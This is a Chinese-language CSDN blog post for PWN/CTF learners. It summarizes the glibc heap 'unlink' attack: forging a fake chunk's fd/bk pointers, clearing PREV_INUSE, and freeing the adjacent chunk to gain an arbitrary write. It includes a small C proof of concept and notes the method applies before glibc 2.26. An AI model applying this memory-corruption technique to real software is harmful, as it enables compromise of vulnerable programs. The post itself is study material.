Unlink漏洞利用总结

最新推荐文章于 2024-09-13 18:06:40 发布
最新推荐文章于 2024-09-13 18:06:40 发布
阅读量427 收藏 1
点赞数 1
分类专栏: PWN 文章标签: 安全 PWN UNLINK
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WateranFire/article/details/108713486
版权

一般是连续的smallbin或者unsortbin堆块(双向链表)a,b,a可以溢出,有一个指针p指向a。在a上伪造一个堆块:

pre_size

size 
fd : p - 3*SIZE_SZ
bk : p - 2*SIZE_SZ

其中SIZE_SZ=sizeof(size_t)

此外还需让b的SIZE最低位被溢出修改为0,即PREV_INUSE为0,并将PREV_SIZE设置为伪造堆块的大小。

之后执行free(b),由于检测到PREV_INUSE为0,对a执行unlink操作,预检查FD->bk==*(p-3*SIZE_SZ+3*SIZE_SZ)==*(p)==a; BK->fd==*(p-2*SIZE_SZ+2*SIZE_SZ)==*p==a,两个检测均可通过。

然后进行unlink,*p=p - 2*SIZE_SZ; *p=p - 3*SIZE_SZ;即p最终指向的是p-3*SIZE_SZ,若p-3*SIZE_SZ也可控的话,可以通过修改p指向的内容设置p-3*SIZE指针的值为任意地址,再修改p-3*SIZE_SZ指向的内容达到任意写。

测试代码:

#include "stdlib.h"
#include "stdio.h"
char tmp[24];
char *a,*b;
int main(void){
    
    unsigned long long x[]={0,0x20,&a-3,&a-2,0x20,0,0x30,0x90};
    printf("sizeof(unsigned long long):%d\n",sizeof(unsigned long long));
    a=(char *)malloc(0x30);
    b=(char *)malloc(0x80);
    memcpy(a,x,64);
    printf("a=%p, b=%p\n",a,b);
    printf("&a=%p\n",&a);
    printf("after free\n");
    free(b);
    printf("a=%p\n",a);
    return 0;
}

需要注意的是,这种方式限于glibc2.26之前的版本,之后的版本新加了限制。

新的利用参考:https://github.com/shellphish/how2heap/blob/master/glibc_2.26/tcache_stashing_unlink_attack.c

https://github.com/shellphish/how2heap

 

堆漏洞之unlink1
08-04
unlink 漏洞利用技巧的核心就在下面这几行代码:SP00F|版权属于我个人所有,你可以用于学习,但不可以用于商业目的漏洞利用的技巧就是覆盖相邻(下一个或下下
版本下的unlink漏洞攻击
fzucaicai的博客
05-22 521
首先unlink操作是发生在unsortedbin里的,也就是说我们构造的堆块必须要大小要是大于等于0x80(包括chunk头的话实际上是0x90,这是最起码的),然后就是构造假的chunk,注意注意,unlink漏洞利用的条件是,首先最最最起码要有一个off by one的漏洞,接着就是构造一个假的chunk,最重要的是构造它的fd,bk指针,还要去修改下一个chunk的presize位和假chunk的size对得上,注意注意,假chunk的size位的in_use位要为1。
【我的 PWN 学习手札】Unlink Attack
最新发布
Mr_Fmnwon的博客
09-13 1303
在除了fastbin、tcachebin的其他空闲堆块的管理bin中,如shortbin、largebin、unsortedbin,内部组织都是双向链表。如下图(示意图来自好好说话之unlink-CSDN博客当需要将second_chunk脱链,使用unlink对second_chunk操作。不难看出,实际上是这样一个过程:我的上一个的下一个=我的下一个,我的下一个的上一个=我的上一个这样“我”就可以取出,因为链上已经没有指针指向“我”,即所谓的脱链。
【堆漏洞-unlink
m0_52343643的博客
04-06 622
当一个堆块(非fastbin)释放,libc会先看其相邻的堆块是否空闲,空闲的话就将这个相邻堆块从bins中取出,并与当前释放堆块合并,而这个bins中取出堆块的过程就是unlink
堆溢出——unlink漏洞攻击(bamboobox)
fzucaicai的博客
03-22 870
当要free掉某个堆块,如果其低地址的chunk是空闲的,那么这里的P就是被释放掉的堆块的地址减去自己的pre_size里的数值,这样就可以指向低地址的chunk的chunk头了,通过堆溢出修改掉被释放的chunk的pre_size和size,就可以达到释放该chunk,unlink调用的P是是指向假chunk的chunk头。1.首先检查被合并的chunk的大小是否正确,程序会先检查被合并的chunk的size是否与其物理相连的下一个chunk的presize是否相符。
我又pwn啦——理论篇 unlink
m0_64195960的博客
06-20 598
1)定义:在双向链表中取出一个chunk的操作2)使用间:1、malloc·在恰好大小的large chunk处取chunk·在比请求大小大的bin中取chunk2、Free·后向合并,合并物理相邻低物理地址空闲chunk·前向合并,合并物理相邻高物理地空闲chunk(top chunk除外)3、malloc_consolidate·后向合并,合并物理相邻低地址空闲chunk·前向合并,合并物理相邻高地址空闲chunk(top chunk除外)4、realloc前向扩展,合并物理相邻高地址空闲
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
玩转堆-堆漏洞的利用技巧.docx
01-10
堆溢出的利用技术包括 Use After Free & Double Free、Heap Overflow、Fast bin attack、Unsorted bin attack、Overwrite Topchunk、Classical&Modern Unlink Attack、Off by one & Off by null 等。其中,Use After...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
Linux unlink函数和删除文件的操作方法
01-09
在Linux系统中,`unlink`函数是用于删除文件或软链接的关键函数。它遵循特定的规则来决定何真正从磁盘上移除文件内容。理解`unlink`的工作原理有助于我们更好地掌握Linux文件系统的操作。 1. **unlink函数**: `...
pwn学习】堆溢出(三)- Unlink和UAF
Morphy_Amo的博客
01-21 1983
堆溢出中的unlink和UAF
PWN之堆利用-unlink攻击
susuate的博客
07-18 1752
环境配置 笔者使用ubuntu14.04.6_desktop_i386 国内镜像网站如下: http://mirrors.aliyun.com/ubuntu-releases/14.04/ glibc版本2.20 unlink攻击
php竞争问题,结合 CTF 详解条件竞争漏洞
weixin_39655377的博客
03-16 385
什么是条件竞争漏洞?条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理,将会导致此类问题的发生。漏洞分析假设有这么一个代码,实现用户上传图片功能if(isset($_GET['src'])){copy($_GET['src'],$_GET['dst']);//...//check fileunlink($_GET...
Linux 二进制漏洞挖掘入门系列之(六)堆块中的 unlink
个人笔记
08-03 967
当我们在使用 free() 函数的候,就是释放一块内存,这是宏观上的表现。深究起来,堆管理器(ptmalloc)会检查其物理相邻的堆块(chunk)是否空闲,如果空闲,则需要将其从所在的 bin (small bins)中释放出来,与当前 free 的 chunk 进行合并,合并之后,再插入到 unsorted bins 中。在这个过程中,**unlink 就是释放空闲堆块**。这个过程中,如果我们可以构造物理相邻的 chunk,那么就有可能造成**任意地址写**。
pwn | 堆知识】关于unlink的体会 [ZJCTF EasyHeap]
ethan18的博客
08-15 320
当进行unlink候,正如同它的名字,它是会被从这个链表中取出来的(unlink也就是取消自己的link状态了)主要的思路就是通过创建3个chunk,将第一个chunk通过edit函数来修改chunk内容和下一个chunk的头部,变成一个伪造的空闲chunk,然后free第2个chunk,这会导致第一个chunk被unlink。在我看来,unlink的原理是,当你free了一个chunk的候,如果你的物理相邻的chunk如果是空闲状态,那么这个空闲的chunk就会被合并,形成一个更大的chunk。
c语言 unlink,unlink 漏洞笔记
weixin_39806948的博客
05-24 708
前导知识malloc_chunk 结构struct malloc_chunk {INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */struct malloc_...
Pwn Unlink堆攻击技术原理以及例题
红叶的博客
12-17 1115
现在有这么三个chunk,其中我们已经构造好了Unlink的Payload。乍一看可能有点一头雾水,那么如果我们把这段看成一个chunk结构体呢?反之,另一个也是这个道理。glibc 2.23中的unlink宏源码是这样的。,这段恰好满足我们的unlink需求。,也就是我们的fake_chunk。,我们直接查看这个fd指向了哪里。,P是fake_chunk,也就是。这题的堆块指针位于bss段内,是。P是fake_chunk,即可获得我们的fd和bk。complete,或者说。指向的都是同一个地方。
Heap-Unlink一谈
qq_41252520的博客
08-12 440
前话 原理在这就不说了,很多博主说得都非常的详细,我也是从他们那里学到的。本篇主要就是讲解常见的Unlink利用。主要分为有泄漏操作和无泄漏操作。 有泄漏操作就是能够输出堆中的信息,无泄漏就是不能泄露堆中的信息。 有泄漏操作 ZCTF-2016-note2 【保护】: RELRO保护一定要非常注意,如果是这种情况下(部分开启),说明任意函数的got表都可写;如果是完全开启(FULL)...
漏洞利用:理解unlink机制与技巧
"堆漏洞之unlink1 - 一篇关于Linux环境下glibc库中堆管理漏洞的分析和利用技术的文章,作者SP00F强调了unlink操作在内存管理中的关键作用,以及如何通过覆盖相邻chunk的prev_inuse位来触发漏洞利用。文章适合于学习...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值